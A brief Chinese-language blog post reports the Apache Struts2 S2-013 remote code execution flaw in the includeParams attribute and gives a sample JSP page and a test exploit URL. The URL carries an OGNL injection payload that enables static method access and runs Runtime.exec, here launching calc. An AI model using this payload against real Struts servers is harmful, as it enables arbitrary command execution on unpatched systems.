Struts2再爆远程代码执行漏洞

摘要
Apache官方的struts2产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是0DAY,官方没有修补方案出现。
http://struts.apache.org/development/2.x/docs/security-bulletins.html — (公告)
官方安全公告给出了编号和简要介绍,“A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution”。
但是并没有说原理,也没有发布任何补丁。

s.jsp:
Java代码
[php]
<%@ page language="java" import="java.util.*" pageEncoding="utf-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
Click here.[/php]

测试EXP:
[php]http://admin-pc:8080/Struts2/s.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}[/php]

发表评论